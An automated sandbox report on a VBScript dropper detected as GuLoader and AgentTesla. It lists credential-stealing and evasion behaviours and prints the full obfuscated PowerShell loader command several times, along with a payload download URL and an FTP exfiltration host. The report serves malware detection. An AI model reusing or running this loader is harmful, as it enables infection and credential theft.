Windows Analysis Report
Richiesta urgente.vbs

Overview

General Information

Sample Name: Richiesta urgente.vbs
Analysis ID: 755115
MD5: de0edf01710a38b1e96688ae2f712ebb
SHA1: 6791a70cf79c415ba109e86734bcfd1b4930ec31
SHA256: 20796159ce1191fe88603ee4be1855bca614bcb29161d149a6990b48589d88c5
Tags: vbs

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • wscript.exe (PID: 4088 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 1004 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5840 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe 
hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAgeNurSu3Ke2Ma`"""Fo)fl]DepdiuCibStlOuiSecBi ScsHytBjalitFliDrcBl ToeCoxBytFoeGarRenPo SeitunMetDa UnGMoeprtHaKFoefoyNeSBotMuaGrtFeeSk(BaiVinSttNo SkFFooUnrGe)Di;lo[ByDPelTulMiIMimKapCooInrPutxe(Un`"""RegCydWoiDo3Me2Us`"""St)Be]KopMauHybBolEdiLvcRe SksDatFlaTitdaiChcDr EneMexFetTaeTorWenKl BriErnThtRe LaPAloPelGiySoTBueCrxSetDiOInuBetKo(VeiNanEmtRe UfFFoeSpeSidInsSttSt,YoiPanBltLe ElFOblSpoUrrKieFu,NeiEtnEltPs TrLRaiBemAn)Be;Br[UbDArlMylStIismStpAcoHerLytHe(vl`"""SuuUnsPreAfrhj3Kr2Pr`"""Un)Un]IspPauSrbPalSmicocma FrsretBoaSttBeiancPr OweBoxKotFaeUrrSnnSu FriStnUntma AnESaxUrcTrlliuPrdBrePsUBepTodDoaUntArePoRAugMonBy(DeiKlnHatVa PaUMunAbdPr1Ba3Ti7Le,UniSknAntSk UnKSonUniUnrPo)Ni;Sk[MiDaslEklStIUnmRkptroCarUntEl(Kr`"""TikCueDyrVanBreIdlUn3Bo2Di`"""po)Su]IdpenudrbTmlOpiGrcfl MesMatKhaDotDiiSycAs LaeOvxRetUreGrrUsnst OuivinPetBe KoSAreXatFrCMioAinFlsLooUnlOpeTeMOdoLodGoecr(sciMunsutCh LvCYdrKoaChvVeaUntTa,iniApnlstNs 
RuSGovgrmKumKr)Th;Pa[ElDDilStlviISamTepKooAfrFotMa(la`"""SikAeeDdrafnToeSnlCa3Ob2Ag`"""St)he]TepInuStbFolPeiPrcan PosphtSyaudtSoiDecBl OueSaxNotNoeBerLanPo TeIVanSatRePPrtLarBl LaEArnSyuTrmnoSReyDesSktRaeKlmBlLPaoTecImaUtlAneDisPeWMe(KauLyiDenOvttn CrvAc1Cu,SjilonAmtOy SavKa2St)Ti;Be}Ti'De;br`$PrRReeSkaEmbRerPhiSvdKogKueUrdYo3Ts=Ba[FyRtieMaaNobSmrHoiLidUdgBieReddr1Id]Co:Af:GlVBriExrMetFouInaImlReAGrllalAkoKocDi(Un0Ud,No1In0Pa4Ef8at5Ca7Ta6ul,Ch1ud2Ha2Ha8Ud8Be,Bo6Ve4Sy)do;Sc`$FeHPaeDraFjdStbEiaOmnaldFosCr=Tv(KvGRoeSjtTu-siIKrtAbeApmSaPParEkoLypsoeChrUdtHeySt Fl-ToPgraPotSnhBi Ge'UnHToKDaCSaUAf:Al\FlAApnCotTaaPrrRi\OvHmiaSlnBadBrlGniKonUdgPrsGo'un)Mi.TiDHjeortOseWokGrtBreAlrCaiPinFygFoeGurEsnAdeKksLo;Un`$BoTRewReihenReeTh Kr=Ls Ov[MeSVeyOpsVetAzeMymAu.OmCThoAgnPivSwelarTotEl]Ne:Vg:ReFserMeoismInBEraTrsDeeAb6Po4SpSRetacrLeiinnDegPa(Ra`$ClHBeeVoaBodUnbBeaPonBedDisLo)Le;Ti[UnSTryOfsPatCleShmRe.SeRReuMinSttFoiAemCueEl.TrITunBhtEveErrProKopTrSNyeRergevLeiPhcKrePhsEd.seMSuaFirunsPrhAaaDelSo]Ej:Pr:WrCReoHypDeyGr(Ho`$AgTRewFoidinTaeSt,Fo Ca0Sc,Wi Th Ca`$EkRCyePoaQubdirPsividOpgRaeDadOs3do,Ku Ga`$MiTMawUniefnBreFo.TrcRvoFiuRanbytSp)Su;Pa[afRFoeJuaRebChrUniPldmngIneSedCo1lo]Tu:Af:NyEIcnBluRemGuSOsyCesPrtDieDimItLProBicToaDalSaeHasTrWDe(Fi`$SoRIneFoaGabEjrKeiPodRegSieTodSa3lu,Is Eg0fe)pi#Vo;""";Function Reabridged4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Regionplanarbejderne = $Regionplanarbejderne + $HS.Substring($i, 1); } $Regionplanarbejderne;}$Enterprise0 = Reabridged4 'GrITyEDoXLy ';$Enterprise1= Reabridged4 $Skolegaardene;&$Enterprise0 $Enterprise1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4416 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 1076 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • CasPol.exe (PID: 6072 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 827875A7EE6003FC7F5301C613A2BB1C)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Richiesta urgente.vbs | WScript_Shell_PowerShell_Combo | Detects malware from Middle Eastern campaign reported by Talos | Florian Roth | Strings:
  • 0xa34:$s1: .CreateObject("WScript.Shell")
  • 0x3f562:$p1: powershell.exe
  • 0x4c69c:$p1: powershell.exe
Source | Rule | Description | Author | Strings
0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.759722470.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000A.00000000.627203109.0000000001350000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: powershell.exe PID: 5840 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
  • 0x15ed6:$b2: ::FromBase64String(
  • 0x5e98a:$b2: ::FromBase64String(
  • 0x17beb2:$b2: ::FromBase64String(
  • 0x268a5:$s1: -join
  • 0x27005:$s1: -join
  • 0xb3272:$s1: -join
  • 0xc0347:$s1: -join
  • 0xc3719:$s1: -join
  • 0xc3dcb:$s1: -join
  • 0xc58bc:$s1: -join
  • 0xc7ac2:$s1: -join
  • 0xc82e9:$s1: -join
  • 0xc8b59:$s1: -join
  • 0xc9294:$s1: -join
  • 0xc92c6:$s1: -join
  • 0xc930e:$s1: -join
  • 0xc932d:$s1: -join
  • 0xc9b7d:$s1: -join
  • 0xc9cf9:$s1: -join
  • 0xc9d71:$s1: -join
  • 0xc9e04:$s1: -join
Source | Rule | Description | Author | Strings
amsi64_4088.amsi.csv | WScript_Shell_PowerShell_Combo | Detects malware from Middle Eastern campaign reported by Talos | Florian Roth | Strings:
  • 0x1a:$s1: .CreateObject("WScript.Shell")
  • 0x72:$s1: .CreateObject("WScript.Shell")
  • 0x1d9:$p1: powershell.exe

Data Obfuscation

          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn 
PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""U
No Snort rule has matched

AV Detection

Source: ftp.mcmprint.net | Virustotal: Detection: 9%
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: Binary string: fk8C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.pdb source: powershell.exe, 00000003.00000002.738843445.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp
Source: Joe Sandbox View | IP Address: 185.31.121.136
Source: global traffic | HTTP traffic detected: GET /nnslx/arPdDEHecKTUsOQSyN133.asi HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: qwedft.gq | Cache-Control: no-cache
Source: unknown | FTP traffic detected: 185.31.121.136:21 -> 192.168.2.5:49711 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- | 220-You are user number 1 of 50 allowed. | 220-Local time is now 12:08. Server port: 21. | 220-This is a private system - No anonymous login | 220-IPv6 connections are also welcome on this server. | 220 You will be disconnected after 15 minutes of inactivity.
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ftp://ftp.mcmprint.netnoffice
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000A.00000002.836359577.000000001DBDA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.836857074.000000001DC27000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.734109094.0000000001621000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://3LpbHlMRrrHdHc2KU.net
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://OowQOv.com
Source: powershell.exe, 00000003.00000003.515219304.0000000007748000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000003.00000003.515219304.0000000007748000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: CasPol.exe, 0000000A.00000002.823176402.000000000178B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi
Source: powershell.exe, 00000003.00000002.727863466.0000000004761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.751015129.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | DNS traffic detected: queries for: qwedft.gq

System Summary

Source: Process Memory Space: powershell.exe PID: 5840, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi 
StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
Source: Initial file: Jibboom.ShellExecute Cystatrophia162, " " & chrw(34) & A5 & chrw(34), "", "", 0
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 5465
